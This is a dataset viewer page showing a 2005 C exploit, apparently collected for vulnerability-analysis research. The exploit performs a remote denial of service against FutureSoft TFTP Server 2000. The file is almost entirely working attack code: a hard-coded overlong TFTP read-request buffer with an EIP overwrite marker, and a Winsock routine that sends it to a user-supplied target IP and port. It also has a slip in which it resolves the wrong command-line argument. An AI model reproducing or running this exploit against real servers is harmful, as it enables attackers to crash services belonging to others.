Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1027.txt115 linesDownload Raw Back to exploits
1/*

2*

3* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit

4* http://www.futuresoft.com/products/lit-tftp2000.htm

5* Bug Discovered by SIG^2 (http://www.security.org.sg)

6* Exploit coded By ATmaCA

7* Web: atmacasoft.com && spyinstructors.com

8* E-Mail: atmaca@icqmail.com

9* Credit to kozan

10* Usage:tftp_exp <targetIp> [targetPort]

11*

12*/

13

14/*

15*

16* Vulnerable Versions:

17* TFTP Server 2000 Evaluation Version 1.0.0.1

18*

19*/

20

21#include <windows.h>

22#include <stdio.h>

23

24#pragma comment(lib, "ws2_32.lib")

25

26/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */

27char expbuffer[] =

28"\x00\x01"

29"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

30"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

31"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

32"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

33"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

34"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

35"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

36"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

37"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

38"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

39"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

40"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

41"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

42"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

43"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

44"\x58\x58\x58\x58" /* EIP */

45"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x41\x41"

46"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

47"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x6E\x65\x74\x61\x73\x63\x69"

48"\x69\x00";

49

50void main(int argc, char *argv[])

51{

52        WSADATA wsaData;

53        WORD wVersionRequested;

54        struct hostent *pTarget;

55        struct sockaddr_in sock;

56        SOCKET mysocket;

57        int destPORT = 69;//Default to 69

58

59        if (argc < 2){

60                printf("FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\n");

61                printf("http://www.futuresoft.com/products/lit-tftp2000.htm\n");

62                printf("Bug Discovered by SIG^2 (http://www.security.org.sg)\n");

63                printf("Exploit coded By ATmaCA\n");

64                printf("Web: atmacasoft.com && spyinstructors.com\n");

65                printf("E-Mail: atmaca@icqmail.com\n");

66                printf("Credit to kozan\n");

67                printf("Usage:tftp_exp <targetIp> [targetPort]\n");

68                return;

69        }

70        if (argc==3)

71                destPORT=atoi(argv[2]);

72

73        printf("Requesting Winsock...\n");

74        wVersionRequested = MAKEWORD(1, 1);

75        if (WSAStartup(wVersionRequested, &wsaData) < 0) {

76                printf("No winsock suitable version found!");

77                return;

78        }

79        mysocket = socket(AF_INET, SOCK_DGRAM	, 0);

80        if(mysocket==INVALID_SOCKET){

81                printf("Can't create UDP socket\n");

82                exit(1);

83        }

84        printf("Resolving Hostnames...\n");

85        if ((pTarget = gethostbyname(argv[2])) == NULL){

86                printf("Resolve of %s failed\n", argv[1]);

87                exit(1);

88        }

89        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);

90        sock.sin_family = AF_INET;

91        sock.sin_port = htons(destPORT);

92

93        printf("Connecting...\n");

94        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){

95                printf("Couldn't connect to host.\n");

96                exit(1);

97        }

98

99        printf("Connected!...\n");

100        Sleep(10);

101

102        printf("RRQ->Sending packet. Size: %d\n",sizeof(expbuffer));

103        if (send(mysocket,expbuffer, sizeof(expbuffer)+1, 0) == -1){

104                printf("Error sending packet\n");

105                closesocket(mysocket);

106                exit(1);

107        }

108        printf("Packet sent........\n");

109        printf("Success.\n");

110

111        closesocket(mysocket);

112        WSACleanup();

113}

114

115// milw0rm.com [2005-06-02]